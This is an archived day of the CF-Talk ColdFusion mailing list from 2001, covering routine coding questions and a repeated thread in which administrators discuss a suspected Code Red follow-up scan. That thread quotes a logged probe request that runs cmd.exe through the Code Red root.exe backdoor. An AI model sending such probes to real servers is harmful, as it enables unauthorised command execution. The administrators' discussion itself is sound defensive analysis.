Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Star Interactive (John Ceci)


Check for *.eml files on your IIS boxes, we got them everywhere...and our
virus software is not picking anything up at all...



-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:37 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


even we're getting hammered with syn flood attacks.

Rich Wild

> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:52
> To: CF-Talk
> Subject: FW: Code Red backdoor triggered?
>
>
> It seems there may be some unusual network activity today
> worth noting.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
>
>
> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, 18 September, 2001 10:49
> To: [EMAIL PROTECTED]
> Subject: RE: Code Red backdoor triggered?
>
>
> > Heads up. Pay attention to your servers today. I just
> > started detecting a *ton* of these requests. I think it's
> > a follow-up worm programmed to take advantage of the
> > backdoors Code Red dropped on infected computers. Maybe a
> > Code Red III?
> >
> > -Cameron
> >
> > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > dhcp181.onewebsystems.com
> > (130.205.102.181) on port 80 (tcp).
> > [09/18/2001 09:25:55.166 GMT-0400] GET
> > /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
>
> After a more careful reading, I don't think this is an attack
> at all. I
> think it's worse than an attack.
>
> The GET request doesn't do anything except run the DOS dir
> command using the
> command processor. But, if a server responds with an HTTP 200
> status code,
> this indicates that the server is vulnerable to running
> cmd.exe through the
> web server.
>
> So, my guess is that this is a vulnerability scan. Once a
> list of vulnerable
> servers is compiled, a real attack would take much less time
> than a Code
> Red-style attack, since you could build the list of
> vulnerable servers into
> the attack code!
>
> This idea has been discussed a bit in the last month or so -
> it's called a
> "Warhol" worm, the idea being that an attack might cover the mass of
> vulnerable machines in fifteen minutes. Here's a URL to the article:
>
> http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
5&mode=nocomme
nt&threshold=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Control your subscriptions to ACFUG lists via the ACFUG website at


~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Paris Lundis


Uggh! not the code-red variations again...

Can you tell us Rich if it is impacting the servers ?? Are  you 
patched, and does this thing use something new or is it the same 
exploit as before...

Seems like it is becoming a net-30 terror :)

-paris
[finding the future in the past, passing the future in the present]
[connecting people, places and things]


-Original Message-
From: Rich Wild <[EMAIL PROTECTED]>
Date: Tue, 18 Sep 2001 15:37:13 +0100
Subject: RE: Code Red backdoor triggered?

> even we're getting hammered with syn flood attacks.
> 
> Rich Wild
> 
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 15:52
> > To: CF-Talk
> > Subject: FW: Code Red backdoor triggered?
> > 
> > 
> > It seems there may be some unusual network activity today 
> > worth noting.
> > 
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> > 
> > 
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, 18 September, 2001 10:49
> > To: [EMAIL PROTECTED]
> > Subject: RE: Code Red backdoor triggered?
> > 
> > 
> > > Heads up. Pay attention to your servers today. I just 
> > > started detecting a *ton* of these requests. I think it's 
> > > a follow-up worm programmed to take advantage of the 
> > > backdoors Code Red dropped on infected computers. Maybe a
> > > Code Red III?
> > > 
> > > -Cameron
> > > 
> > > [09/18/2001 09:25:55.136 GMT-0400] Connection: 
> > > dhcp181.onewebsystems.com
> > > (130.205.102.181) on port 80 (tcp).
> > > [09/18/2001 09:25:55.166 GMT-0400] GET 
> > > /scripts/root.exe?/c+dir HTTP/1.0
> > > Host: www
> > > Connnection: close
> > 
> > After a more careful reading, I don't think this is an attack 
> > at all. I
> > think it's worse than an attack.
> > 
> > The GET request doesn't do anything except run the DOS dir 
> > command using the
> > command processor. But, if a server responds with an HTTP 200 
> > status code,
> > this indicates that the server is vulnerable to running 
> > cmd.exe through the
> > web server.
> > 
> > So, my guess is that this is a vulnerability scan. Once a 
> > list of vulnerable
> > servers is compiled, a real attack would take much less time 
> > than a Code
> > Red-style attack, since you could build the list of 
> > vulnerable servers into
> > the attack code!
> > 
> > This idea has been discussed a bit in the last month or so - 
> > it's called a
> > "Warhol" worm, the idea being that an attack might cover the mass
> of
> > vulnerable machines in fifteen minutes. Here's a URL to the
> article:
> > 
> > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> 5&mode=nocomme
> nt&threshold=
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
> -
> ---
> 
> Control your subscriptions to ACFUG lists via the ACFUG website at
> 
> 
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: CF eating up RAM

2001-09-18 Thread Tyson Vanek


Make sure you're locking all your shared-scope variables.  Writing code
without properly locking on shared-scope variables can cause serious memory
leaks in ColdFusion.  If you're not familiar with this practice, I would
suggest reading the following two articles.

"ColdFusion Locking Best Practices" by Jim Schley
http://www.allaire.com/handlers/index.cfm?id=17318&method=full

"Locking in ColdFusion" by Ben Forta
http://www.allaire.com/handlers/index.cfm?ID=17196&Method=Full

90% of the time I've been called in to address "RAM eating" behavior on a
ColdFusion server, this is the primary contributor to the leaking behavior.

-Tyson

-Original Message-
From: nyon [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 9:48 PM
To: CF-Talk
Subject: Re: CF eating up RAM


Hi,

I notice that the cold fusion service is slowly eating up my RAM. After 18
days, it consumes about 22MB of RAM from a lowly figure of
5MB. I have installed service pack for CF 4.5.1.

Any solutions ?
Nyon

FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Want to make a CFX tag but have only CF language expereience

2001-09-18 Thread Jeremy Allen


Perl is excellent for parsing data.

Java will also work well. You may want to
chop the file up into chunks and process
each chunk so that you are not processing
an entire 400 megabyte file at once.

The C++ CFX API is not really that difficult
and is documented fairly well. I have a lot
of experience with C so I am probably a bit
biased being used to C API documentation.

String processing in C takes longer to actually
create, as would any C program, but can be the
most efficient when written properly. Given
the extreme size of the log files whatever you
do it may not need to use the CFX API.

Java, the syntax of the language, is easy enough
to master. You can at least get crude procedural
programs working in hardly no time. Getting the
hang of Object Oriented programming is another
matter. Coming from a straight ColdFusion
background it will be a complete retraining of
your thought process. It is not impossible or
really that difficult, it does however take
time and practice.

C IMO is much easier to learn than Java. C is a
clean and straightforward language. C++ is another
story. C has quite a few hidden gotchas that
can make it prohibitive and undesirable, Java
solves most of the failings of C, such as dealing
with memory allocation etc.

Given the emergence of Java, it is probably most
wise to invest time in Java. I like C and am glad
it was one of the first languages I learned, but
whatever works. Just remember to find the tools
that will help you solve your problems the best :)


Jeremy Allen
elliptIQ Inc.
--
http://www.neighborware.com
America's Leading Community Network Software

>-Original Message-
>From: Jon Hall [mailto:[EMAIL PROTECTED]]
>Sent: Monday, September 17, 2001 5:26 PM
>To: CF-Talk
>Subject: Re: Want to make a CFX tag but have only CF language
>expereience
>
>
>CFX programming is done in either Java or C++ (others?). Java is by far the
>easier to learn though. I cant really speak for C, but the process for
>interfacing with CF via the Java CFX api is prettty simple as long as you
>understand Java. I dont know if I have formal programming experience, but I
>picked up enough Java to do what you want just hitting the books at night
>and on the weekends for 3 or 4 months.
>However text parsing is such a common task that there are many tools out
>there that could help. SQL Server's BCP might do the trick, then you could
>play with the data via TSQL. Access has some kind of text import capability
>too. Depending on your platform (unix/win) a shell script could do
>this too.
>Even Studio's VTML engine supports the necessary functions (i'm not
>suggesting it though)... :)
>
>jon
>- Original Message -
>From: "Robert Everland" <[EMAIL PROTECTED]>
>To: "CF-Talk" <[EMAIL PROTECTED]>
>Sent: Monday, September 17, 2001 4:35 PM
>Subject: Want to make a CFX tag but have only CF language expereience
>
>
>> Ok I was finally given a chore that I can not accomplish with CF. I
>> have to through a whole month of proxy logs that are about 400mb total
>> looking up specfic users and the entries they made based on
>certain sites.
>> It involves a lot of looping and text file reading. It just messes up all
>of
>> CF when I try it. Can anyone recomend a good starting place where I can
>pick
>> up programming a CFX fairly simple. Are the included documentation a good
>> start for someone with no formal programming expereience?
>>
>> Robert Everland III
>> Dixon Ticonderoga
>>
>
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: MSN

2001-09-18 Thread Rey Bango


AFAIK, they have no API for that. If you find it, please let me know. I've
been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN


> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Rich Wild


even we're getting hammered with syn flood attacks.

Rich Wild

> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:52
> To: CF-Talk
> Subject: FW: Code Red backdoor triggered?
> 
> 
> It seems there may be some unusual network activity today 
> worth noting.
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
> 
> 
> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, 18 September, 2001 10:49
> To: [EMAIL PROTECTED]
> Subject: RE: Code Red backdoor triggered?
> 
> 
> > Heads up. Pay attention to your servers today. I just 
> > started detecting a *ton* of these requests. I think it's 
> > a follow-up worm programmed to take advantage of the 
> > backdoors Code Red dropped on infected computers. Maybe a
> > Code Red III?
> > 
> > -Cameron
> > 
> > [09/18/2001 09:25:55.136 GMT-0400] Connection: 
> > dhcp181.onewebsystems.com
> > (130.205.102.181) on port 80 (tcp).
> > [09/18/2001 09:25:55.166 GMT-0400] GET 
> > /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
> 
> After a more careful reading, I don't think this is an attack 
> at all. I
> think it's worse than an attack.
> 
> The GET request doesn't do anything except run the DOS dir 
> command using the
> command processor. But, if a server responds with an HTTP 200 
> status code,
> this indicates that the server is vulnerable to running 
> cmd.exe through the
> web server.
> 
> So, my guess is that this is a vulnerability scan. Once a 
> list of vulnerable
> servers is compiled, a real attack would take much less time 
> than a Code
> Red-style attack, since you could build the list of 
> vulnerable servers into
> the attack code!
> 
> This idea has been discussed a bit in the last month or so - 
> it's called a
> "Warhol" worm, the idea being that an attack might cover the mass of
> vulnerable machines in fifteen minutes. Here's a URL to the article:
> 
> http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
5&mode=nocomme
nt&threshold=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Control your subscriptions to ACFUG lists via the ACFUG website at

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

MSN

2001-09-18 Thread webmaster


Does anyone know how to send a MSN message from a CF app ?


TIA

Richard

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

FW: Code Red backdoor triggered?

2001-09-18 Thread Dave Watts


It seems there may be some unusual network activity today worth noting.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 18 September, 2001 10:49
To: [EMAIL PROTECTED]
Subject: RE: Code Red backdoor triggered?


> Heads up. Pay attention to your servers today. I just 
> started detecting a *ton* of these requests. I think it's 
> a follow-up worm programmed to take advantage of the 
> backdoors Code Red dropped on infected computers. Maybe a
> Code Red III?
> 
> -Cameron
> 
> [09/18/2001 09:25:55.136 GMT-0400] Connection: 
> dhcp181.onewebsystems.com
> (130.205.102.181) on port 80 (tcp).
> [09/18/2001 09:25:55.166 GMT-0400] GET 
> /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close

After a more careful reading, I don't think this is an attack at all. I
think it's worse than an attack.

The GET request doesn't do anything except run the DOS dir command using the
command processor. But, if a server responds with an HTTP 200 status code,
this indicates that the server is vulnerable to running cmd.exe through the
web server.

So, my guess is that this is a vulnerability scan. Once a list of vulnerable
servers is compiled, a real attack would take much less time than a Code
Red-style attack, since you could build the list of vulnerable servers into
the attack code!

This idea has been discussed a bit in the last month or so - it's called a
"Warhol" worm, the idea being that an attack might cover the mass of
vulnerable machines in fifteen minutes. Here's a URL to the article:

http://hacktivism.openflows.org/article.pl?sid=01/08/13/1237245&mode=nocomme
nt&threshold=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Control your subscriptions to ACFUG lists via the ACFUG website at
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Format Tables (Was RE: CF to excel)

2001-09-18 Thread cf refactoring


Can you show us the looping code? It's probably an
error in reusing too much of the sample code

--- Janine Jakim <[EMAIL PROTECTED]> wrote:
> Thanks for all the input. Now for the next question.
>  I am having a hard
> time formatting my html table correctly. I am using
> #Skill[1]#
> #Skill[2]# in the heading (I have also
> tried making it just a
> regular .  But unfortunately it is
> giving each student a
> heading.
> ie:   Reading MathSpelling
> JSmithA   A   A
>   Reading MathSpelling
> SJonesB   B   B
> 
> So I have 2 questions:
> 1. Is there a way to get the heading to be for the
> whole page when I am
> using a variable?
> 2.  Is there a way to make the #skill[1]#
> #Skill[2]#, etc. expand/constrict
> accordingly.
> (ie: 5th grade Math has 3 skills/ reading has 16
> skills whereas 1st grade
> math has 21 skills and 19 reading skills) I
> don't want to have to make a
> different page for each subject/grade.  If I just
> put #Skill# in the header
> it only gives me the 1st skill... Any ideas???
> 
> -Original Message-
> From: John Anderson [mailto:[EMAIL PROTECTED]]
> Sent: Monday, September 17, 2001 4:00 PM
> To: CF-Talk
> Subject: RE: CF to excel
> 
> 
> You can create an html table and output that is an
> excel file as follows:
> 
> 
> 
> 
>   
>   
>   First Name">
>   Last
> Name">
>   Office
> Phone">
>   Mobile
> Phone">
>&"Pager">
>   
>   
&"#empfirstname##emplastname##officep##ce
> ll##pager#">
>   
>   ">
>   
> 
> 
> 
> 
> #excelstring#
> 
> 
> 
> This output string that you have built will come
> across as an excel file.
> 
> The key is in the cfcontent tag and cfheader tag.
> 
> John Anderson
> aloha-webdesign.com
> 
> -Original Message-
> From: Janine Jakim [mailto:[EMAIL PROTECTED]]
> Sent: Monday, September 17, 2001 12:40 PM
> To: CF-Talk
> Subject: CF to excel
> 
> 
> How flexible is the process of generating excel
> files?
> I need to have an output that is dynamic for the
> columns and rows.
> For example:
> 
>   #student#   #student#   #student#   #student#
> #Skill#   #grade# #grade# #grade# #grade#
> #Skill#   #grade# #grade# #grade# #grade#
> #Skill#   #grade# #grade# #grade# #grade#
> 
> Translating into:
>   JohnSmith   JanSmithSamJonessandyJones
> Reading   C  A   A   B
> Math  B  A   B   A
> English   B  B   A   C
> 
> My tables are normalized. There are many tables that
> make this info.
> 1.  One reference table that lists all the skills. 
> 2.  One table that shows student information.
> 3.  One table that lists the studentID/skillID/Grade
> (hooks the student info
> with the skills reference table).
> 4.  One reference table that lists the quarter and
> dates of the quarter so
> only the current quarter prints out.
> Is this possible?
> What are the steps to making it so?  Do I need to
> make the information into
> an array(s) first?
> I've read the how to from Ben's CF5 book and the
> tutorial from cfcomet.com-
> but of course I want to make things more difficult.
> Thanks in advance.
> 
> 
> 
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

checkboxes to action pages

2001-09-18 Thread Michael Vinson


Hi,

I have a list of records (to delete) with checkboxes. i.e. user wants to
delete recs & clicks checkbox
Once the user clicks submit (Delete) Here's what I know:
- How many items in the list
- My 'index' to the list (using email address), which contains a subset
of the query displayed in the form. Note that the number of email
addresses I capture is equal to the total number of items in list.

Here's what do not know:
- How to match my form checkbox name (delChecked) to my data as
described above! The parameters that get passed to my 'action page'
reveal (to me, at least) a compressed list showing data (e.g. on,on,on)
but how in the world do I match this to... item 1 checked, item 3
checked, item 5 checked

Ain't learning great!

Thank in advance ... -Mike
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Format Tables (Was RE: CF to excel)

2001-09-18 Thread Larry Juncker


Try this:


  
 Skill1Skill2Skill3
  
  


#StudentName##ReadingScore##MathScore#Spellin
gScore#

  


This should get you started toward what you want.  I don;t have time to
right the whole page layout right now, but I hope that this will help you in
the right direction.

Larry Juncker
Senior Cold Fusion Developer
Heartland Communications Group, Inc.
[EMAIL PROTECTED]

-Original Message-
From: Janine Jakim [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:01 AM
To: CF-Talk
Subject: Format Tables (Was RE: CF to excel)


Thanks for all the input. Now for the next question.  I am having a hard
time formatting my html table correctly. I am using #Skill[1]#
#Skill[2]# in the heading (I have also tried making it just a
regular .  But unfortunately it is giving each student a
heading.
ie: Reading MathSpelling
JSmith  A   A   A
Reading MathSpelling
SJones  B   B   B

So I have 2 questions:
1. Is there a way to get the heading to be for the whole page when I am
using a variable?
2.  Is there a way to make the #skill[1]# #Skill[2]#, etc. expand/constrict
accordingly.
(ie: 5th grade Math has 3 skills/ reading has 16 skills whereas 1st grade
math has 21 skills and 19 reading skills) I don't want to have to make a
different page for each subject/grade.  If I just put #Skill# in the header
it only gives me the 1st skill... Any ideas???

-Original Message-
From: John Anderson [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 4:00 PM
To: CF-Talk
Subject: RE: CF to excel


You can create an html table and output that is an excel file as follows:






First Name">
Last
Name">
Office
Phone">
Mobile
Phone">
Pager">

#empfirstname##emplastname##officep##ce
ll##pager#">

">





#excelstring#



This output string that you have built will come across as an excel file.

The key is in the cfcontent tag and cfheader tag.

John Anderson
aloha-webdesign.com

-Original Message-
From: Janine Jakim [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 12:40 PM
To: CF-Talk
Subject: CF to excel


How flexible is the process of generating excel files?
I need to have an output that is dynamic for the columns and rows.
For example:

#student#   #student#   #student#   #student#
#Skill# #grade# #grade# #grade# #grade#
#Skill# #grade# #grade# #grade# #grade#
#Skill# #grade# #grade# #grade# #grade#

Translating into:
JohnSmith   JanSmithSamJonessandyJones
Reading C  A   A   B
MathB  A   B   A
English B  B   A   C

My tables are normalized. There are many tables that make this info.
1.  One reference table that lists all the skills.
2.  One table that shows student information.
3.  One table that lists the studentID/skillID/Grade (hooks the student info
with the skills reference table).
4.  One reference table that lists the quarter and dates of the quarter so
only the current quarter prints out.
Is this possible?
What are the steps to making it so?  Do I need to make the information into
an array(s) first?
I've read the how to from Ben's CF5 book and the tutorial from cfcomet.com-
but of course I want to make things more difficult.
Thanks in advance.



~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

OT: IIS4 Programatically enter redirections

2001-09-18 Thread Job Blogss


Hello all,

Is there any way to programatically add redirections into IIS4 on NT via cf, 
vb etc or some other means (without using the iis administrator)?  Does the 
administrator take any command line parameters to add redirections?  I 
searched the registry for current redirections but I can't find them.  Does 
anyone know where they are stored?

Thanks in advance!

-John


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Is the still a newsgroup address for this forum?

2001-09-18 Thread Howie Hamlin


Try news.fuseware.com.  I just checked and it's still there and up to 
date...

HTH,

Howie Hamlin - inFusion Project Manager
On-Line Data Solutions, Inc. - www.CoolFusion.com
631-737-4668 x101
inFusion Mail Server (iMS) - The Intelligent Mail Server
>>> Find out how iMS Stacks up to the competition: 
http://www.coolfusion.com/imssecomparison.cfm

- Original Message - 
From: "W. Hubbard" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:41 AM
Subject: Is the still a newsgroup address for this forum?


> Is there a newsgroup address for this forum or a place
> to search for information from previous messages?  
> 
> I seem to remember something about a way to identify
> the screen pixel size so that web page could be
> adjusted accordingly.  Does anyone know how to do this
> or where to find information about how to do this.
> 
> 
> 
> 
> 
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: OT: Suggestion to list

2001-09-18 Thread Todd Ashworth


Couldn't you just use the search feature to find any E-mail sent to cf-talk
and then move it to the appropriate folder all at once?

Todd

- Original Message -
From: "Andrew Scott" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:07 AM
Subject: RE: OT: Suggestion to list


> Sorry to but in here, but I am going to agree with the addition to
> [cf-talk] or something to identify this. And I'll tell you why, most of
> us are windows based users. Out of all these the majority would be using
> a MS product for their email whether it be Outlook or Outlook Express.
>
> Yes it supports rules, however MS has a very annoying bug where every
> now and then one of two things happens.
>
> 1) You are just receiving email, you close the program down and not
> realized that the program was doing this. Every so often the program
> keeps running in the background, what will 90% of the time happen is
> that all this email coming in will go directly into the inbox and
> because you have closed outlook there are NO rules to be run.
>
> 2) When you open outlook it will sometimes, for no apparent reason or
> even any form of pattern that I can find as yet! Where the rules get
> ignored all together, now to resort the thousands of email I get this is
> very painstaking to move around having to click on each message and look
> at the sent to field to determine which of the 200 folders to put it
> into!!
>
> Now most would not be affected by those 2 scenarios, however I find that
> outlook does do the above on a regular basis on 9 machines that I have
> sat at and even software wise that is installed before or after is not
> even remotely the same in most cases.
>
> Point, well the point is if you had to do the above. It would be very
> easy to look at the header and move in groups rather than one by one!
>
>
> Regards,
> Andrew Scott



~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Format Tables (Was RE: CF to excel)

2001-09-18 Thread Janine Jakim


Thanks for all the input. Now for the next question.  I am having a hard
time formatting my html table correctly. I am using #Skill[1]#
#Skill[2]# in the heading (I have also tried making it just a
regular .  But unfortunately it is giving each student a
heading.
ie: Reading MathSpelling
JSmith  A   A   A
Reading MathSpelling
SJones  B   B   B

So I have 2 questions:
1. Is there a way to get the heading to be for the whole page when I am
using a variable?
2.  Is there a way to make the #skill[1]# #Skill[2]#, etc. expand/constrict
accordingly.
(ie: 5th grade Math has 3 skills/ reading has 16 skills whereas 1st grade
math has 21 skills and 19 reading skills) I don't want to have to make a
different page for each subject/grade.  If I just put #Skill# in the header
it only gives me the 1st skill... Any ideas???

-Original Message-
From: John Anderson [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 4:00 PM
To: CF-Talk
Subject: RE: CF to excel


You can create an html table and output that is an excel file as follows:






First Name">
Last
Name">
Office
Phone">
Mobile
Phone">
Pager">

#empfirstname##emplastname##officep##ce
ll##pager#">

">





#excelstring#



This output string that you have built will come across as an excel file.

The key is in the cfcontent tag and cfheader tag.

John Anderson
aloha-webdesign.com

-Original Message-
From: Janine Jakim [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 12:40 PM
To: CF-Talk
Subject: CF to excel


How flexible is the process of generating excel files?
I need to have an output that is dynamic for the columns and rows.
For example:

#student#   #student#   #student#   #student#
#Skill# #grade# #grade# #grade# #grade#
#Skill# #grade# #grade# #grade# #grade#
#Skill# #grade# #grade# #grade# #grade#

Translating into:
JohnSmith   JanSmithSamJonessandyJones
Reading C  A   A   B
MathB  A   B   A
English B  B   A   C

My tables are normalized. There are many tables that make this info.
1.  One reference table that lists all the skills. 
2.  One table that shows student information.
3.  One table that lists the studentID/skillID/Grade (hooks the student info
with the skills reference table).
4.  One reference table that lists the quarter and dates of the quarter so
only the current quarter prints out.
Is this possible?
What are the steps to making it so?  Do I need to make the information into
an array(s) first?
I've read the how to from Ben's CF5 book and the tutorial from cfcomet.com-
but of course I want to make things more difficult.
Thanks in advance.


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: OT: Suggestion to list

2001-09-18 Thread Andrew Scott


Sorry to but in here, but I am going to agree with the addition to
[cf-talk] or something to identify this. And I'll tell you why, most of
us are windows based users. Out of all these the majority would be using
a MS product for their email whether it be Outlook or Outlook Express.

Yes it supports rules, however MS has a very annoying bug where every
now and then one of two things happens.

1) You are just receiving email, you close the program down and not
realized that the program was doing this. Every so often the program
keeps running in the background, what will 90% of the time happen is
that all this email coming in will go directly into the inbox and
because you have closed outlook there are NO rules to be run.

2) When you open outlook it will sometimes, for no apparent reason or
even any form of pattern that I can find as yet! Where the rules get
ignored all together, now to resort the thousands of email I get this is
very painstaking to move around having to click on each message and look
at the sent to field to determine which of the 200 folders to put it
into!!

Now most would not be affected by those 2 scenarios, however I find that
outlook does do the above on a regular basis on 9 machines that I have
sat at and even software wise that is installed before or after is not
even remotely the same in most cases.

Point, well the point is if you had to do the above. It would be very
easy to look at the header and move in groups rather than one by one!


Regards,
Andrew Scott


-Original Message-
From: C. Hatton Humphrey [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, 18 September 2001 13:15 PM
To: CF-Talk
Subject: RE: OT: Suggestion to list

As a suggestion, if you are using an email client that handles rules you
can
set up a rule to filter into a different folder.  That's what I've been
doing since I subscribed back in January and it works quite well.

Hatton

> -Original Message-
> From: valhalla [mailto:[EMAIL PROTECTED]]
> Sent: Monday, September 17, 2001 10:49 PM
> To: CF-Talk
> Subject: Suggestion to list
>
>
> I just read the comment of a person who is faced with a lot of
> e/m to read.
> I think that it would be better if the subject title of all of
> the e/m from
> this
> group starts with [cf-talk].
>
> I am subscribed to some groups of which the posting subjects
> start with similar
> heading.
>
> This would allow subscribers to look at the important stuff first and
then
> deal with the SPAM and e/m from in-laws.
> Thomas Smith
> 

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: OT: Macromedia Legal Issue

2001-09-18 Thread Jeffry Houser

  This might better fit over on the CF-Partners list.
  I doubt there are any legal issues.

  I'm curious about the efficiency of a custom tag that does nothing but 
drop in some custom JavaScripts.  Have you tested it for efficiency of 
